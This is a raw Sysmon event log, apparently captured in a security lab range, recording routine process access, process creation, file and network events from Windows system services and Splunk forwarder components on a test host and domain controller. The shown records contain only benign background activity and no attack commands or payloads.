10341000x8000000000000000223602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AA8-6216-6B05-000000003902}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AA8-6216-6B05-000000003902}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.895{4F8D34B0-1AA8-6216-6B05-000000003902}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.410{4F8D34B0-1AA8-6216-6A05-000000003902}36123364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AA8-6216-6A05-000000003902}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF24DF100267FC7A6EE651E8EC4CA8EF,SHA256=E3432B2E36F0A27550E2ADF52DCA1BB6D9D7122B8B495A3249BD3F0BE7AF4231,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1AA8-6216-6A05-000000003902}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.222{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AA8-6216-6A05-000000003902}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.223{4F8D34B0-1AA8-6216-6A05-000000003902}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:44.355{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F84827D16F2D995BF87120330DDD955,SHA256=5067B0833857481BB536C48769C6A1AA342D9C3E08B3532DF6AD2890A0992BD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:41.524{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51799-false10.0.1.12-8000- 354300x8000000000000000299863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:42.531{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49661-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:45.370{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DEB95F4DB10AEDD0D71A5F07B228B16,SHA256=488DA414E6A64CEB11FEB6B1742F652DA68DA7660A349A3550A5CD0BFD182C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:45.753{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2ED021972295679444A9B2C06BD24D4,SHA256=A0CFECB13B84D736A2B1CD4644AE32C1ED106D9C05BE99B45180EA4565683403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:45.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C23ED56AA21AA99FF2D37E1593344488,SHA256=E4A037F425B507068EEDB016146CA033FD263FD2836F488D850C01994328526A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:45.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5A02F388C90DC82820076F56B6B67D5,SHA256=C8EEE930E49F89D31B7F49FFA30A3C6EE3634862E47E670F6BEBD60C67FAF07E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:46.370{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687A8207444DCC032DAA8DC94475B4D3,SHA256=7AF1AA3206EA22A4199214E061FE1E6CC25CC221E742502ECC549151AC310CB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.878{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.878{4F8D34B0-1AAA-6216-6C05-000000003902}13161016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AAA-6216-6C05-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 